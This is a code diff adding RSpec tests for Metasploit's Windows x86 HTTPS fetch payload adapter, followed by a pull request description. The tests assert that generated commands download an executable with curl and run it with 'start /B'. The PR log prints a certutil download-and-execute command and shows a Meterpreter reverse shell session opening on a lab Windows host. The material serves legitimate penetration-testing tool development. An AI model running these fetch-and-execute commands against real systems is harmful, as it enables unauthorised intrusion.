-      end
-    end
   end
 
   describe '#fetch_protocol' do

--- a/spec/modules/payloads/adapters/cmd/windows/https/x86_spec.rb
+++ b/spec/modules/payloads/adapters/cmd/windows/https/x86_spec.rb
@@ -1,0 +1,172 @@
+require 'rspec'
+
+RSpec.describe 'cmd/windows/https/x86' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  # Adapter payloads cannot be instantiated standalone; they must be combined
+  # with a compatible single payload. We use windows/meterpreter_reverse_tcp
+  # (ARCH_X86, Platform=win) so the adapter's generate_fetch_commands can be
+  # exercised.
+  let(:subject) do
+    load_and_create_module(
+      module_type: 'payload',
+      reference_name: 'cmd/windows/https/x86/meterpreter_reverse_tcp',
+      ancestor_reference_names: [
+        'adapters/cmd/windows/https/x86',
+        'singles/windows/meterpreter_reverse_tcp'
+      ]
+    )
+  end
+
+  let(:lhost) { '192.168.1.100' }
+  let(:lport) { '4444' }
+  let(:fetch_srvhost) { '192.168.1.100' }
+  let(:fetch_srvport) { 8443 }
+  let(:fetch_uripath) { 'testpayload' }
+  let(:fetch_command) { 'CURL' }
+  let(:fetch_filename) { 'payload' }
+  let(:fetch_writable_dir) { '%TEMP%' }
+
+  let(:datastore_values) do
+    {
+      'LHOST' => lhost,
+      'LPORT' => lport,
+      'FETCH_SRVHOST' => fetch_srvhost,
+      'FETCH_SRVPORT' => fetch_srvport,
+      'FETCH_URIPATH' => fetch_uripath,
+      'FETCH_COMMAND' => fetch_command,
+      'FETCH_FILENAME' => fetch_filename,
+      'FETCH_WRITABLE_DIR' => fetch_writable_dir
+    }
+  end
+
+  before(:each) do
+    subject.datastore.merge!(datastore_values)
+  end
+
+  describe 'module metadata' do
+    it 'includes HTTPS Fetch in the name' do
+      expect(subject.name).to include('HTTPS Fetch')
+    end
+
+    it 'targets the Windows platform' do
+      expect(subject.platform.platforms).to include(Msf::Module::Platform::Windows)
+    end
+
+    it 'uses CMD arch' do
+      expect(subject.arch).to include(ARCH_CMD)
+    end
+
+    it 'adapts x86 payloads' do
+      expect(subject.send(:module_info)['AdaptedArch']).to eq(ARCH_X86)
+    end
+
+    it 'has win as the adapted platform' do
+      expect(subject.send(:module_info)['AdaptedPlatform']).to eq('win')
+    end
+
+    it 'adapts x86 and not x64 payloads' do
+      expect(subject.send(:module_info)['AdaptedArch']).not_to eq(ARCH_X64)
+    end
+  end
+
+  describe 'FETCH_COMMAND option' do
+    it 'defaults to CURL' do
+      fresh_subject = load_and_create_module(
+        module_type: 'payload',
+        reference_name: 'cmd/windows/https/x86/meterpreter_reverse_tcp',
+        ancestor_reference_names: [
+          'adapters/cmd/windows/https/x86',
+          'singles/windows/meterpreter_reverse_tcp'
+        ]
+      )
+      expect(fresh_subject.datastore['FETCH_COMMAND']).to eq('CURL')
+    end
+
+    it 'accepts CURL as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CURL')).to be(true)
+    end
+
+    it 'accepts TFTP as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('TFTP')).to be(true)
+    end
+
+    it 'accepts CERTUTIL as a valid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('CERTUTIL')).to be(true)
+    end
+
+    it 'rejects WGET as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('WGET')).to be(false)
+    end
+
+    it 'rejects FTP as an invalid value' do
+      expect(subject.options['FETCH_COMMAND'].valid?('FTP')).to be(false)
+    end
+  end
+
+  describe '#generate_fetch_commands' do
+    context 'with CURL (default)' do
+      let(:fetch_command) { 'CURL' }
+
+      it 'generates a curl download command over HTTPS' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('curl -sko')
+        expect(cmd).to include("https://#{fetch_srvhost}:#{fetch_srvport}/#{fetch_uripath}")
+      end
+
+      it 'includes the remote destination path' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include("#{fetch_writable_dir}\\#{fetch_filename}.exe")
+      end
+
+      it 'executes the payload with start /B' do
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include('start /B')
+      end
+
+      it 'does not include del when FETCH_DELETE is false' do
+        subject.datastore['FETCH_DELETE'] = false
+        cmd = subject.generate_fetch_commands
+        expect(cmd).not_to include(' del ')
+      end
+
+      it 'includes del when FETCH_DELETE is true' do
+        subject.datastore['FETCH_DELETE'] = true
+        cmd = subject.generate_fetch_commands
+        expect(cmd).to include(' del ')
+      end
+    end
+
+    # CERTUTIL does not support HTTPS — it always raises a bad-config error.
+    context 'with CERTUTIL' do
+      let(:fetch_command) { 'CERTUTIL' }
+
+      it 'raises a bad-config error because CERTUTIL does not support HTTPS' do
+        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
+      end
+    end
+
+    # The TFTP client requires a TFTP server (fetch_protocol='TFTP'), so using
+    # TFTP as the FETCH_COMMAND with an HTTPS adapter always fails at runtime.
+    context 'with TFTP' do
+      let(:fetch_command) { 'TFTP' }
+      let(:fetch_srvport) { 69 }
+
+      it 'raises a bad-config error because the HTTPS adapter cannot serve TFTP' do
+        expect { subject.generate_fetch_commands }.to raise_error(RuntimeError, /bad-config/)
+      end
+    end
+  end
+
+  describe '#fetch_protocol' do
+    it 'returns HTTPS' do
+      expect(subject.fetch_protocol).to eq('HTTPS')
+    end
+  end
+
+  describe '#windows?' do
+    it 'returns true for this Windows platform module' do
+      expect(subject.windows?).to be(true)
+    end
+  end
+end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1390,12 +1390,28 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'cmd/windows/http/x64'
   end
 
+  context 'cmd/windows/http/x86' do
+    it_should_behave_like 'payload is not cached',
+                          ancestor_reference_names: [
+                            'adapters/cmd/windows/http/x86'
+                          ],
+                          reference_name: 'cmd/windows/http/x86'
+  end
+
   context 'cmd/windows/https/x64' do
     it_should_behave_like 'payload is not cached',
                           ancestor_reference_names: [
                             'adapters/cmd/windows/https/x64'
                           ],
                           reference_name: 'cmd/windows/https/x64'
+  end
+
+  context 'cmd/windows/https/x86' do
+    it_should_behave_like 'payload is not cached',
+                          ancestor_reference_names: [
+                            'adapters/cmd/windows/https/x86'
+                          ],
+                          reference_name: 'cmd/windows/https/x86'
   end
 
   context 'cmd/windows/powershell' do


### PR DESCRIPTION
I'm lazy and added this to make testing the Indirect Syscall easier; I figured I'd go ahead and PR it.
```
msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/windows/http/x86/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      LFVuldXrQS       no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH       x                no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


View the full module info with the info, or info -d command.

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > to_handler
[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/x %TEMP%\qgWXjldDTi.exe & start /B %TEMP%\qgWXjldDTi.exe
[*] Payload Handler Started as Job 0
msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /x
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.189 requested /x
[*] Sending payload to 10.5.132.189 (Microsoft-CryptoAPI/6.1)
[*] Client 10.5.132.189 requested /x
[*] Sending payload to 10.5.132.189 (CertUtil URL Agent)
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (200774 bytes) to 10.5.132.189
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.189:49249) at 2026-03-23 15:49:01 -0500

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : MSFUSER-PC
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
```